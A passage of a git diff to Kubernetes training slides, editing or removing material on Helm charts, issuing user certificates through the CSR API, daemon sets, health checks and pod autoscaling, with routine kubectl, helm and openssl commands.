-- Then we will expose that configmap as a container environment variable
+- Then we will expose that configmap to a container environment variable
 
 ---
 

slides/k8s/create-chart.md

@@ -1,114 +0,0 @@
-## Creating a chart
-
-- We are going to show a way to create a *very simplified* chart
-
-- In a real chart, *lots of things* would be templatized
-
-  (Resource names, service types, number of replicas...)
-
-.exercise[
-
-- Create a sample chart:
-  ```bash
-  helm create dockercoins
-  ```
-
-- Move away the sample templates and create an empty template directory:
-  ```bash
-  mv dockercoins/templates dockercoins/default-templates
-  mkdir dockercoins/templates
-  ```
-
-]
-
----
-
-## Exporting the YAML for our application
-
-- The following section assumes that DockerCoins is currently running
-
-.exercise[
-
-- Create one YAML file for each resource that we need:
-  .small[
-  ```bash
-
-	while read kind name; do
-	  kubectl get -o yaml $kind $name > dockercoins/templates/$name-$kind.yaml
-	done <<EOF
-	deployment worker
-	deployment hasher
-	daemonset rng
-	deployment webui
-	deployment redis
-	service hasher
-	service rng
-	service webui
-	service redis
-	EOF
-  ```
-  ]
-
-]
-
----
-
-## Testing our helm chart
-
-.exercise[
-
-- Let's install our helm chart! (`dockercoins` is the path to the chart)
-  ```
-  helm install dockercoins
-  ```
-]
-
---
-
-- Since the application is already deployed, this will fail:<br>
-`Error: release loitering-otter failed: services "hasher" already exists`
-
-- To avoid naming conflicts, we will deploy the application in another *namespace*
-
----
-
-## Switching to another namespace
-
-- We can create a new namespace and switch to it
-
-  (Helm will automatically use the namespace specified in our context)
-
-- We can also tell Helm which namespace to use
-
-.exercise[
-
-- Tell Helm to use a specific namespace:
-  ```bash
-  helm install dockercoins --namespace=magenta
-  ```
-
-]
-
----
-
-## Checking our new copy of DockerCoins
-
-- We can check the worker logs, or the web UI
-
-.exercise[
-
-- Retrieve the NodePort number of the web UI:
-  ```bash
-  kubectl get service webui --namespace=magenta
-  ```
-
-- Open it in a web browser
-
-- Look at the worker logs:
-  ```bash
-  kubectl logs deploy/worker --tail=10 --follow --namespace=magenta
-  ```
-
-]
-
-Note: it might take a minute or two for the worker to start.

slides/k8s/csr-api.md

@@ -1,426 +0,0 @@
-# The CSR API
-
-- The Kubernetes API exposes CSR resources
-
-- We can use these resources to issue TLS certificates
-
-- First, we will go through a quick reminder about TLS certificates
-
-- Then, we will see how to obtain a certificate for a user
-
-- We will use that certificate to authenticate with the cluster
-
-- Finally, we will grant some privileges to that user
-
----
-
-## Reminder about TLS
-
-- TLS (Transport Layer Security) is a protocol providing:
-
-  - encryption (to prevent eavesdropping)
-
-  - authentication (using public key cryptography)
-
-- When we access an https:// URL, the server authenticates itself
-
-  (it proves its identity to us; as if it were "showing its ID")
-
-- But we can also have mutual TLS authentication (mTLS)
-
-  (client proves its identity to server; server proves its identity to client)
-
----
-
-## Authentication with certificates
-
-- To authenticate, someone (client or server) needs:
-
-  - a *private key* (that remains known only to them)
-
-  - a *public key* (that they can distribute)
-
-  - a *certificate* (associating the public key with an identity)
-
-- A message encrypted with the private key can only be decrypted with the public key
-
-  (and vice versa)
-
-- If I use someone's public key to encrypt/decrypt their messages,
-  <br/>
-  I can be certain that I am talking to them / they are talking to me
-
-- The certificate proves that I have the correct public key for them
-
----
-
-## Certificate generation workflow
-
-This is what I do if I want to obtain a certificate.
-
-1. Create public and private keys.
-
-2. Create a Certificate Signing Request (CSR).
-
-   (The CSR contains the identity that I claim and a public key.)
-
-3. Send that CSR to the Certificate Authority (CA).
-
-4. The CA verifies that I can claim the identity in the CSR.
-
-5. The CA generates my certificate and gives it to me.
-
-The CA (or anyone else) never needs to know my private key.
-
----
-
-## The CSR API
-
-- The Kubernetes API has a CertificateSigningRequest resource type
-
-  (we can list them with e.g. `kubectl get csr`)
-
-- We can create a CSR object
-
-  (= upload a CSR to the Kubernetes API)
-
-- Then, using the Kubernetes API, we can approve/deny the request
-
-- If we approve the request, the Kubernetes API generates a certificate
-
-- The certificate gets attached to the CSR object and can be retrieved
-
----
-
-## Using the CSR API
-
-- We will show how to use the CSR API to obtain user certificates
-
-- This will be a rather complex demo
-
-- ... And yet, we will take a few shortcuts to simplify it
-
-  (but it will illustrate the general idea)
-
-- The demo also won't be automated
-
-  (we would have to write extra code to make it fully functional)
-
----
-
-## General idea
-
-- We will create a Namespace named "users"
-
-- Each user will get a ServiceAccount in that Namespace
-
-- That ServiceAccount will give read/write access to *one* CSR object
-
-- Users will use that ServiceAccount's token to submit a CSR
-
-- We will approve the CSR (or not)
-
-- Users can then retrieve their certificate from their CSR object
-
-- ...And use that certificate for subsequent interactions
-
----
-
-## Resource naming
-
-For a user named `jean.doe`, we will have:
-
-- ServiceAccount `jean.doe` in Namespace `users`
-
-- CertificateSigningRequest `users:jean.doe`
-
-- ClusterRole `users:jean.doe` giving read/write access to that CSR
-
-- ClusterRoleBinding `users:jean.doe` binding ClusterRole and ServiceAccount
-
----
-
-## Creating the user's resources
-
-.warning[If you want to use another name than `jean.doe`, update the YAML file!]
-
-.exercise[
-
-- Create the global namespace for all users:
-  ```bash
-  kubectl create namespace users
-  ```
-
-- Create the ServiceAccount, ClusterRole, ClusterRoleBinding for `jean.doe`:
-  ```bash
-  kubectl apply -f ~/container.training/k8s/users:jean.doe.yaml
-  ```
-
-]
-
----
-
-## Extracting the user's token
-
-- Let's obtain the user's token and give it to them
-
-  (the token will be their password)
-
-.exercise[
-
-- List the user's secrets:
-  ```bash
-  kubectl --namespace=users describe serviceaccount jean.doe
-  ```
-
-- Show the user's token:
-  ```bash
-  kubectl --namespace=users describe secret `jean.doe-token-xxxxx`
-  ```
-
-]
-
----
-
-## Configure `kubectl` to use the token
-
-- Let's create a new context that will use that token to access the API
-
-.exercise[
-
-- Add a new identity to our kubeconfig file:
-  ```bash
-  kubectl config set-credentials token:jean.doe --token=...
-  ```
-
-- Add a new context using that identity:
-  ```bash
-  kubectl config set-context jean.doe --user=token:jean.doe --cluster=kubernetes
-  ```
-
-]
-
----
-
-## Access the API with the token
-
-- Let's check that our access rights are set properly
-
-.exercise[
-
-- Try to access any resource:
-  ```bash
-  kubectl get pods
-  ```
-  (This should tell us "Forbidden")
-
-- Try to access "our" CertificateSigningRequest:
-  ```bash
-  kubectl get csr users:jean.doe
-  ```
-  (This should tell us "NotFound")
-
-]
-
----
-
-## Create a key and a CSR
-
-- There are many tools to generate TLS keys and CSRs
-
-- Let's use OpenSSL; it's not the best one, but it's installed everywhere
-
-  (many people prefer cfssl, easyrsa, or other tools; that's fine too!)
-
-.exercise[
-
-- Generate the key and certificate signing request:
-  ```bash
-    openssl req -newkey rsa:2048 -nodes -keyout key.pem \
-                -new -subj /CN=jean.doe/O=devs/ -out csr.pem
-  ```
-
-]
-
-The command above generates:
-
-- a 2048-bit RSA key, without encryption, stored in key.pem
-- a CSR for the name `jean.doe` in group `devs`
-
----
-
-## Inside the Kubernetes CSR object
-
-- The Kubernetes CSR object is a thin wrapper around the CSR PEM file
-
-- The PEM file needs to be encoded to base64 on a single line
-
-  (we will use `base64 -w0` for that purpose)
-
-- The Kubernetes CSR object also needs to list the right "usages"
-
-  (these are flags indicating how the certificate can be used)
-
----
-
-## Sending the CSR to Kubernetes
-
-.exercise[
-
-- Generate and create the CSR resource:
-  ```bash
-    kubectl apply -f - <<EOF
-    apiVersion: certificates.k8s.io/v1beta1
-    kind: CertificateSigningRequest
-    metadata:
-      name: users:jean.doe
-    spec:
-      request: $(base64 -w0 < csr.pem)
-      usages:
-      - digital signature
-      - key encipherment
-      - client auth
-    EOF
-  ```
-
-]
-
----
-
-## Adjusting certificate expiration
-
-- By default, the CSR API generates certificates valid 1 year
-
-- We want to generate short-lived certificates, so we will lower that to 1 hour
-
-- Fow now, this is configured [through an experimental controller manager flag](https://github.com/kubernetes/kubernetes/issues/67324)
-
-.exercise[
-
-- Edit the static pod definition for the controller manager:
-  ```bash
-  sudo vim /etc/kubernetes/manifests/kube-controller-manager.yaml
-  ```
-
-- In the list of flags, add the following line:
-  ```bash
-  - --experimental-cluster-signing-duration=1h
-  ```
-
-]
-
----
-
-## Verifying and approving the CSR
-
-- Let's inspect the CSR, and if it is valid, approve it
-
-.exercise[
-
-- Switch back to `cluster-admin`:
-  ```bash
-  kctx -
-  ```
-
-- Inspect the CSR:
-  ```bash
-  kubectl describe csr users:jean.doe
-  ```
-
-- Approve it:
-  ```bash
-  kubectl certificate approve users:jean.doe
-  ```
-
-]
-
----
-
-## Obtaining the certificate
-
-.exercise[
-
-- Switch back to the user's identity:
-  ```bash
-  kctx -
-  ```
-
-- Retrieve the updated CSR object and extract the certificate:
-  ```bash
-  kubectl get csr users:jean.doe \
-          -o jsonpath={.status.certificate} \
-          | base64 -d > cert.pem
-  ```
-
-- Inspect the certificate:
-  ```bash
-  openssl x509 -in cert.pem -text -noout
-  ```
-
-]
-
----
-
-## Using the certificate
-
-.exercise[
-
-- Add the key and certificate to kubeconfig:
-  ```bash
-  kubectl config set-credentials cert:jean.doe --embed-certs \
-          --client-certificate=cert.pem --client-key=key.pem
-  ```
-
-- Update the user's context to use the key and cert to authenticate:
-  ```bash
-  kubectl config set-context jean.doe --user cert:jean.doe
-  ```
-
-- Confirm that we are seen as `jean.doe` (but don't have permissions):
-  ```bash
-  kubectl get pods
-  ```
-
-]
-
----
-
-## What's missing?
-
-We have just shown, step by step, a method to issue short-lived certificates for users.
-
-To be usable in real environments, we would need to add:
-
-- a kubectl helper to automatically generate the CSR and obtain the cert
-
-  (and transparently renew the cert when needed)
-
-- a Kubernetes controller to automatically validate and approve CSRs
-
-  (checking that the subject and groups are valid)
-
-- a way for the users to know the groups to add to their CSR
-
-  (e.g.: annotations on their ServiceAccount + read access to the ServiceAccount)
-
----
-
-## Is this realistic?
-
-- Larger organizations typically integrate with their own directory
-
-- The general principle, however, is the same:
-
-  - users have long-term credentials (password, token, ...)
-
-  - they use these credentials to obtain other, short-lived credentials
-
-- This provides enhanced security:
-
-  - the long-term credentials can use long passphrases, 2FA, HSM...
-
-  - the short-term credentials are more convenient to use
-
-  - we get strong security *and* convenience
-
-- Systems like Vault also have certificate issuance mechanisms

slides/k8s/daemonset.md

@@ -38,7 +38,7 @@
 
 <!-- ##VERSION## -->
 
-- Unfortunately, as of Kubernetes 1.15, the CLI cannot create daemon sets
+- Unfortunately, as of Kubernetes 1.14, the CLI cannot create daemon sets
 
 --
 
@@ -73,13 +73,18 @@
 
 - Dump the `rng` resource in YAML:
   ```bash
-  kubectl get deploy/rng -o yaml >rng.yml
+  kubectl get deploy/rng -o yaml --export >rng.yml 
   ```
 
 - Edit `rng.yml`
 
 ]
 
+Note: `--export` will remove "cluster-specific" information, i.e.:
+- namespace (so that the resource is not tied to a specific namespace)
+- status and creation timestamp (useless when creating a new resource)
+- resourceVersion and uid (these would cause... *interesting* problems)
+
 ---
 
 ## "Casting" a resource to another
@@ -371,7 +376,7 @@ But ... why do these pods (in particular, the *new* ones) have this `app=rng` la
 
 - Bottom line: if we remove our `app=rng` label ...
 
- ... The pod "disappears" for its parent, which re-creates another pod to replace it
+ ... The pod "diseappears" for its parent, which re-creates another pod to replace it
 
 ---
 

slides/k8s/dashboard.md

@@ -153,7 +153,5 @@ The dashboard will then ask you which authentication you want to use.
 
 --
 
-- It introduces new failure modes
-
-  (for instance, if you try to apply YAML from a link that's no longer valid)
+- It introduces new failure modes (like if you try to apply yaml from a link that's no longer valid)
 

slides/k8s/declarative.md

@@ -1,20 +1,6 @@
 ## Declarative vs imperative in Kubernetes
 
-- With Kubernetes, we cannot say: "run this container"
-
-- All we can do is write a *spec* and push it to the API server
-
-  (by creating a resource like e.g. a Pod or a Deployment)
-
-- The API server will validate that spec (and reject it if it's invalid)
-
-- Then it will store it in etcd
-
-- A *controller* will "notice" that spec and act upon it
-
----
-
-## Reconciling state
+- Virtually everything we create in Kubernetes is created from a *spec*
 
 - Watch for the `spec` fields in the YAML files later!
 

slides/k8s/deploymentslideshow.md

@@ -1,67 +0,0 @@
-## 19,000 words
-
-They say, "a picture is worth one thousand words."
-
-The following 19 slides show what really happens when we run:
-
-```bash
-kubectl run web --image=nginx --replicas=3
-```
-
----
-class: pic
-![](images/kubectl-run-slideshow/01.svg)
----
-class: pic
-![](images/kubectl-run-slideshow/02.svg)
----
-class: pic
-![](images/kubectl-run-slideshow/03.svg)
----
-class: pic
-![](images/kubectl-run-slideshow/04.svg)
----
-class: pic
-![](images/kubectl-run-slideshow/05.svg)
----
-class: pic
-![](images/kubectl-run-slideshow/06.svg)
----
-class: pic
-![](images/kubectl-run-slideshow/07.svg)
----
-class: pic
-![](images/kubectl-run-slideshow/08.svg)
----
-class: pic
-![](images/kubectl-run-slideshow/09.svg)
----
-class: pic
-![](images/kubectl-run-slideshow/10.svg)
----
-class: pic
-![](images/kubectl-run-slideshow/11.svg)
----
-class: pic
-![](images/kubectl-run-slideshow/12.svg)
----
-class: pic
-![](images/kubectl-run-slideshow/13.svg)
----
-class: pic
-![](images/kubectl-run-slideshow/14.svg)
----
-class: pic
-![](images/kubectl-run-slideshow/15.svg)
----
-class: pic
-![](images/kubectl-run-slideshow/16.svg)
----
-class: pic
-![](images/kubectl-run-slideshow/17.svg)
----
-class: pic
-![](images/kubectl-run-slideshow/18.svg)
----
-class: pic
-![](images/kubectl-run-slideshow/19.svg)

slides/k8s/dmuc.md

@@ -33,7 +33,7 @@
 
 ## Our environment
 
-- We will use the machine indicated as `dmuc1`
+- We will use the machine indicated as `dmuc`
 
   (this stands for "Dessine Moi Un Cluster" or "Draw Me A Sheep",
   <br/>in homage to Saint-Exupery's "The Little Prince")
@@ -54,7 +54,7 @@
 
 .exercise[
 
-- Log into the `dmuc1` machine
+- Log into the `dmuc` machine
 
 - Get root:
   ```bash
@@ -106,7 +106,7 @@
 - Try to start the API server:
   ```bash
   kube-apiserver
-  # It will fail with "--etcd-servers must be specified"
+  # It will fail with --etcd-servers must be specified
   ```
 
 ]
@@ -175,7 +175,7 @@ Success!
 
 ]
 
-We should get `No resources found.` and the `kubernetes` service, respectively.
+So far, so good.
 
 Note: the API server automatically created the `kubernetes` service entry.
 
@@ -225,7 +225,7 @@ Success?
 
 ]
 
-Our Deployment is in bad shape:
+Our Deployment is in a bad shape:
 ```
 NAME                  READY   UP-TO-DATE   AVAILABLE   AGE
 deployment.apps/web   0/1     0            0           2m26s
@@ -535,7 +535,7 @@ clusters:
 
 - Start kubelet with that `kubeconfig.kubelet` file:
   ```bash
-  kubelet --kubeconfig kubeconfig.kubelet
+  kubelet --kubeconfig kubelet.kubeconfig
   ```
 
 ]
@@ -559,7 +559,7 @@ Success!
 
 Our node should show up.
 
-Its name will be its hostname (it should be `dmuc1`).
+Its name will be its hostname (it should be `dmuc`).
 
 ---
 
@@ -584,7 +584,7 @@ Our pod is still `Pending`. 🤔
 
 Which is normal: it needs to be *scheduled*.
 
-(i.e., something needs to decide which node it should go on.)
+(i.e., something needs to decide on which node it should go.)
 
 ---
 
@@ -658,7 +658,7 @@ class: extra-details
 
 - This is actually how the scheduler works!
 
-- It watches pods, makes scheduling decisions, and creates Binding objects
+- It watches pods, takes scheduling decisions, creates Binding objects
 
 ---
 
@@ -686,7 +686,7 @@ We should see the `Welcome to nginx!` page.
 
 ## Exposing our Deployment
 
-- We can now create a Service associated with this Deployment
+- We can now create a Service associated to this Deployment
 
 .exercise[
 
@@ -711,11 +711,11 @@ This won't work. We need kube-proxy to enable internal communication.
 
 ## Starting kube-proxy
 
-- kube-proxy also needs to connect to the API server
+- kube-proxy also needs to connect to API server
 
 - It can work with the `--master` flag
 
-  (although that will be deprecated in the future)
+  (even though that will be deprecated in the future)
 
 .exercise[
 
@@ -832,6 +832,6 @@ class: extra-details
 
 - By default, the API server expects to be running directly on the nodes
 
-  (it could be as a bare process, or in a container/pod using the host network)
+  (it could be as a bare process, or in a container/pod using host network)
 
 - ... And it expects to be listening on port 6443 with TLS

slides/k8s/extending-api.md

@@ -61,7 +61,7 @@ There are many possibilities!
 
   - creates a new custom type, `Remote`, exposing a git+ssh server
 
-  - deploy by pushing YAML or Helm charts to that remote
+  - deploy by pushing YAML or Helm Charts to that remote
 
 - Replacing built-in types with CRDs
 
@@ -87,11 +87,7 @@ There are many possibilities!
 
   (and take action when they are created/updated)
 
-*
-Examples:
-[YAML to install the gitkube CRD](https://storage.googleapis.com/gitkube/gitkube-setup-stable.yaml),
-[YAML to install a redis operator CRD](https://github.com/amaizfinance/redis-operator/blob/master/deploy/crds/k8s_v1alpha1_redis_crd.yaml)
-*
+*Example: [YAML to install the gitkube CRD](https://storage.googleapis.com/gitkube/gitkube-setup-stable.yaml)*
 
 ---
 
@@ -117,7 +113,7 @@ Examples:
 
 ## Admission controllers
 
-- When a Pod is created, it is associated with a ServiceAccount
+- When a Pod is created, it is associated to a ServiceAccount
 
   (even if we did not specify one explicitly)
 
@@ -163,7 +159,7 @@ class: pic
 
 - These webhooks can be *validating* or *mutating*
 
-- Webhooks can be set up dynamically (without restarting the API server)
+- Webhooks can be setup dynamically (without restarting the API server)
 
 - To setup a dynamic admission webhook, we create a special resource:
 
@@ -171,7 +167,7 @@ class: pic
 
 - These resources are created and managed like other resources
 
-  (i.e. `kubectl create`, `kubectl get`...)
+  (i.e. `kubectl create`, `kubectl get` ...)
 
 ---
 

slides/k8s/gitworkflows.md

@@ -234,6 +234,6 @@
 
   (see the [documentation](https://github.com/hasura/gitkube/blob/master/docs/remote.md) for more details)
 
-- Gitkube can also deploy Helm charts
+- Gitkube can also deploy Helm Charts
 
   (instead of raw YAML files)

slides/k8s/healthchecks-more.md

@@ -1,393 +0,0 @@
-## Questions to ask before adding healthchecks
-
-- Do we want liveness, readiness, both?
-
-  (sometimes, we can use the same check, but with different failure thresholds)
-
-- Do we have existing HTTP endpoints that we can use?
-
-- Do we need to add new endpoints, or perhaps use something else?
-
-- Are our healthchecks likely to use resources and/or slow down the app?
-
-- Do they depend on additional services?
-
-  (this can be particularly tricky, see next slide)
-
----
-
-## Healthchecks and dependencies
-
-- A good healthcheck should always indicate the health of the service itself
-
-- It should not be affected by the state of the service's dependencies
-
-- Example: a web server requiring a database connection to operate
-
-  (make sure that the healthcheck can report "OK" even if the database is down;
-  <br/>
-  because it won't help us to restart the web server if the issue is with the DB!)
-
-- Example: a microservice calling other microservices
-
-- Example: a worker process
-
-  (these will generally require minor code changes to report health)
-
----
-
-## Adding healthchecks to an app
-
-- Let's add healthchecks to DockerCoins!
-
-- We will examine the questions of the previous slide
-
-- Then we will review each component individually to add healthchecks
-
----
-
-## Liveness, readiness, or both?
-
-- To answer that question, we need to see the app run for a while
-
-- Do we get temporary, recoverable glitches?
-
-  → then use readiness
-
-- Or do we get hard lock-ups requiring a restart?
-
-  → then use liveness
-
-- In the case of DockerCoins, we don't know yet!
-
-- Let's pick liveness
-
----
-
-## Do we have HTTP endpoints that we can use?
-
-- Each of the 3 web services (hasher, rng, webui) has a trivial route on `/`
-
-- These routes:
-
-  - don't seem to perform anything complex or expensive
-
-  - don't seem to call other services
-
-- Perfect!
-
-  (See next slides for individual details)
-
----
-
-- [hasher.rb](https://github.com/jpetazzo/container.training/blob/master/dockercoins/hasher/hasher.rb)
-  ```ruby
-    get '/' do
-      "HASHER running on #{Socket.gethostname}\n"
-    end
-  ```
-
-- [rng.py](https://github.com/jpetazzo/container.training/blob/master/dockercoins/rng/rng.py)
-  ```python
-    @app.route("/")
-    def index():
-      return "RNG running on {}\n".format(hostname)
-  ```
-
-- [webui.js](https://github.com/jpetazzo/container.training/blob/master/dockercoins/webui/webui.js)
-  ```javascript
-    app.get('/', function (req, res) {
-      res.redirect('/index.html');
-    });
-  ```
-
----
-
-## Running DockerCoins
-
-- We will run DockerCoins in a new, separate namespace
-
-- We will use a set of YAML manifests and pre-built images
-
-- We will add our new liveness probe to the YAML of the `rng` DaemonSet
-
-- Then, we will deploy the application
-
----
-
-## Creating a new namespace
-
-- This will make sure that we don't collide / conflict with previous exercises
-
-.exercise[
-
-- Create the yellow namespace:
-  ```bash
-  kubectl create namespace yellow
-  ```
-
-- Switch to that namespace:
-  ```bash
-  kns yellow
-  ```
-
-]
-
----
-
-## Retrieving DockerCoins manifests
-
-- All the manifests that we need are on a convenient repository:
-
-  https://github.com/jpetazzo/kubercoins
-
-.exercise[
-
-- Clone that repository:
-  ```bash
-  cd ~
-  git clone https://github.com/jpetazzo/kubercoins
-  ```
-
-- Change directory to the repository:
-  ```bash
-  cd kubercoins
-  ```
-
-]
-
----
-
-## A simple HTTP liveness probe
-
-This is what our liveness probe should look like:
-
-```yaml
-containers:
-- name: ...
-image: ...
-livenessProbe:
-  httpGet:
-    path: /
-    port: 80
-  initialDelaySeconds: 30
-  periodSeconds: 5
-```
-
-This will give 30 seconds to the service to start. (Way more than necessary!)
-<br/>
-It will run the probe every 5 seconds.
-<br/>
-It will use the default timeout (1 second).
-<br/>
-It will use the default failure threshold (3 failed attempts = dead).
-<br/>
-It will use the default success threshold (1 successful attempt = alive).
-
----
-
-## Adding the liveness probe
-
-- Let's add the liveness probe, then deploy DockerCoins
-
-.exercise[
-
-- Edit `rng-daemonset.yaml` and add the liveness probe
-  ```bash
-  vim rng-daemonset.yaml
-  ```
-
-- Load the YAML for all the resources of DockerCoins:
-  ```bash
-  kubectl apply -f .
-  ```
-
-]
-
----
-
-## Testing the liveness probe
-
-- The rng service needs 100ms to process a request
-
-  (because it is single-threaded and sleeps 0.1s in each request)
-
-- The probe timeout is set to 1 second
-
-- If we send more than 10 requests per second per backend, it will break
-
-- Let's generate traffic and see what happens!
-
-.exercise[
-
-- Get the ClusterIP address of the rng service:
-  ```bash
-  kubectl get svc rng
-  ```
-
-]
-
----
-
-## Monitoring the rng service
-
-- Each command below will show us what's happening on a different level
-
-.exercise[
-
-- In one window, monitor cluster events:
-  ```bash
-  kubectl get events -w
-  ```
-
-- In another window, monitor the response time of rng:
-  ```bash
-  httping `<ClusterIP>`
-  ```
-
-- In another window, monitor pods status:
-  ```bash
-  kubectl get pods -w
-  ```
-
-]
-
----
-
-## Generating traffic
-
-- Let's use `ab` to send concurrent requests to rng
-
-.exercise[
-
-- In yet another window, generate traffic:
-  ```bash
-  ab -c 10 -n 1000 http://`<ClusterIP>`/1
-  ```
-
-- Experiment with higher values of `-c` and see what happens
-
-]
-
-- The `-c` parameter indicates the number of concurrent requests
-
-- The final `/1` is important to generate actual traffic
-
-  (otherwise we would use the ping endpoint, which doesn't sleep 0.1s per request)
-
----
-
-## Discussion
-
-- Above a given threshold, the liveness probe starts failing
-
-  (about 10 concurrent requests per backend should be plenty enough)
-
-- When the liveness probe fails 3 times in a row, the container is restarted
-
-- During the restart, there is *less* capacity available
-
-- ... Meaning that the other backends are likely to timeout as well
-
-- ... Eventually causing all backends to be restarted
-
-- ... And each fresh backend gets restarted, too
-
-- This goes on until the load goes down, or we add capacity
-
-*This wouldn't be a good healthcheck in a real application!*
-
----
-
-## Better healthchecks
-
-- We need to make sure that the healthcheck doesn't trip when
-  performance degrades due to external pressure
-
-- Using a readiness check would have fewer effects
-
-  (but it would still be an imperfect solution)
-
-- A possible combination:
-
-  - readiness check with a short timeout / low failure threshold
-
-  - liveness check with a longer timeout / higher failure treshold
-
----
-
-## Healthchecks for redis
-
-- A liveness probe is enough
-
-  (it's not useful to remove a backend from rotation when it's the only one)
-
-- We could use an exec probe running `redis-cli ping`
-
----
-
-class: extra-details
-
-## Exec probes and zombies
-
-- When using exec probes, we should make sure that we have a *zombie reaper*
-
-  🤔🧐🧟 Wait, what?
-
-- When a process terminates, its parent must call `wait()`/`waitpid()`
-
-  (this is how the parent process retrieves the child's exit status)
-
-- In the meantime, the process is in *zombie* state
-
-  (the process state will show as `Z` in `ps`, `top` ...)
-
-- When a process is killed, its children are *orphaned* and attached to PID 1
-
-- PID 1 has the responsibility of *reaping* these processes when they terminate
-
-- OK, but how does that affect us?
-
----
-
-class: extra-details
-
-## PID 1 in containers
-
-- On ordinary systems, PID 1 (`/sbin/init`) has logic to reap processes
-
-- In containers, PID 1 is typically our application process
-
-  (e.g. Apache, the JVM, NGINX, Redis ...)
-
-- These *do not* take care of reaping orphans
-
-- If we use exec probes, we need to add a process reaper
-
-- We can add [tini](https://github.com/krallin/tini) to our images
-
-- Or [share the PID namespace between containers of a pod](https://kubernetes.io/docs/tasks/configure-pod-container/share-process-namespace/)
-
-  (and have gcr.io/pause take care of the reaping)
-
----
-
-## Healthchecks for worker
-
-- Readiness isn't useful
-
-  (because worker isn't a backend for a service)
-
-- Liveness may help us restart a broken worker, but how can we check it?
-
-- Embedding an HTTP server is an option
-
-  (but it has a high potential for unwanted side effects and false positives)
-
-- Using a "lease" file can be relatively easy:
-
-  - touch a file during each iteration of the main loop
-
-  - check the timestamp of that file from an exec probe
-
-- Writing logs (and checking them from the probe) also works

slides/k8s/healthchecks.md

@@ -108,7 +108,7 @@
 
   (as opposed to merely started)
 
-- Containers in a broken state get killed and restarted
+- Containers in a broken state gets killed and restarted
 
   (instead of serving errors or timeouts)
 

slides/k8s/helm.md

@@ -158,7 +158,7 @@ Where do these `--set` options come from?
 
 ]
 
-The chart's metadata includes a URL to the project's home page.
+The chart's metadata includes an URL to the project's home page.
 
 (Sometimes it conveniently points to the documentation for the chart.)
 
@@ -176,3 +176,77 @@ The chart's metadata includes a URL to the project's home page.
   ```
 
 ]
+
+---
+
+## Creating a chart
+
+- We are going to show a way to create a *very simplified* chart
+
+- In a real chart, *lots of things* would be templatized
+
+  (Resource names, service types, number of replicas...)
+
+.exercise[
+
+- Create a sample chart:
+  ```bash
+  helm create dockercoins
+  ```
+
+- Move away the sample templates and create an empty template directory:
+  ```bash
+  mv dockercoins/templates dockercoins/default-templates
+  mkdir dockercoins/templates
+  ```
+
+]
+
+---
+
+## Exporting the YAML for our application
+
+- The following section assumes that DockerCoins is currently running
+
+.exercise[
+
+- Create one YAML file for each resource that we need:
+  .small[
+  ```bash
+
+	while read kind name; do
+	  kubectl get -o yaml --export $kind $name > dockercoins/templates/$name-$kind.yaml
+	done <<EOF
+	deployment worker
+	deployment hasher
+	daemonset rng
+	deployment webui
+	deployment redis
+	service hasher
+	service rng
+	service webui
+	service redis
+	EOF
+  ```
+  ]
+
+]
+
+---
+
+## Testing our helm chart
+
+.exercise[
+
+- Let's install our helm chart! (`dockercoins` is the path to the chart)
+  ```
+  helm install dockercoins
+  ```
+]
+
+--
+
+- Since the application is already deployed, this will fail:<br>
+`Error: release loitering-otter failed: services "hasher" already exists`
+
+- To avoid naming conflicts, we will deploy the application in another *namespace*

slides/k8s/horizontal-pod-autoscaler.md

@@ -1,245 +0,0 @@
-# The Horizontal Pod Autoscaler
-
-- What is the Horizontal Pod Autoscaler, or HPA?
-
-- It is a controller that can perform *horizontal* scaling automatically
-
-- Horizontal scaling = changing the number of replicas
-
-  (adding/removing pods)
-
-- Vertical scaling = changing the size of individual replicas
-
-  (increasing/reducing CPU and RAM per pod)
-
-- Cluster scaling = changing the size of the cluster
-
-  (adding/removing nodes)
-
----
-
-## Principle of operation
-
-- Each HPA resource (or "policy") specifies:
-
-  - which object to monitor and scale (e.g. a Deployment, ReplicaSet...)
-
-  - min/max scaling ranges (the max is a safety limit!)
-
-  - a target resource usage (e.g. the default is CPU=80%)
-
-- The HPA continuously monitors the CPU usage for the related object
-
-- It computes how many pods should be running:
-
-  `TargetNumOfPods = ceil(sum(CurrentPodsCPUUtilization) / Target)`
-
-- It scales the related object up/down to this target number of pods
-
----
-
-## Pre-requirements
-
-- The metrics server needs to be running
-
-  (i.e. we need to be able to see pod metrics with `kubectl top pods`)
-
-- The pods that we want to autoscale need to have resource requests
-
-  (because the target CPU% is not absolute, but relative to the request)
-
-- The latter actually makes a lot of sense:
-
-  - if a Pod doesn't have a CPU request, it might be using 10% of CPU...
-
-  - ...but only because there is no CPU time available!
-
-  - this makes sure that we won't add pods to nodes that are already resource-starved
-
----
-
-## Testing the HPA
-
-- We will start a CPU-intensive web service
-
-- We will send some traffic to that service
-
-- We will create an HPA policy
-
-- The HPA will automatically scale up the service for us
-
----
-
-## A CPU-intensive web service
-
-- Let's use `jpetazzo/busyhttp`
-
-  (it is a web server that will use 1s of CPU for each HTTP request)
-
-.exercise[
-
-- Deploy the web server:
-  ```bash
-  kubectl create deployment busyhttp --image=jpetazzo/busyhttp
-  ```
-
-- Expose it with a ClusterIP service:
-  ```bash
-  kubectl expose deployment busyhttp --port=80
-  ```
-
-- Get the ClusterIP allocated to the service:
-  ```bash
-  kubectl get svc busyhttp
-  ```
-
-]
-
----
-
-## Monitor what's going on
-
-- Let's start a bunch of commands to watch what is happening
-
-.exercise[
-
-- Monitor pod CPU usage:
-  ```bash
-  watch kubectl top pods
-  ```
-
-- Monitor service latency:
-  ```bash
-  httping http://`ClusterIP`/
-  ```
-
-- Monitor cluster events:
-  ```bash
-  kubectl get events -w
-  ```
-
-]
-
----
-
-## Send traffic to the service
-
-- We will use `ab` (Apache Bench) to send traffic
-
-.exercise[
-
-- Send a lot of requests to the service, with a concurrency level of 3:
-  ```bash
-  ab -c 3 -n 100000 http://`ClusterIP`/
-  ```
-
-]
-
-The latency (reported by `httping`) should increase above 3s.
-
-The CPU utilization should increase to 100%.
-
-(The server is single-threaded and won't go above 100%.)
-
----
-
-## Create an HPA policy
-
-- There is a helper command to do that for us: `kubectl autoscale`
-
-.exercise[
-
-- Create the HPA policy for the `busyhttp` deployment:
-  ```bash
-  kubectl autoscale deployment busyhttp --max=10
-  ```
-
-]
-
-By default, it will assume a target of 80% CPU usage.
-
-This can also be set with `--cpu-percent=`.
-
---
-
-*The autoscaler doesn't seem to work. Why?*
-
----
-
-## What did we miss?
-
-- The events stream gives us a hint, but to be honest, it's not very clear:
-
-  `missing request for cpu`
-
-- We forgot to specify a resource request for our Deployment!
-
-- The HPA target is not an absolute CPU%
-
-- It is relative to the CPU requested by the pod
-
----
-
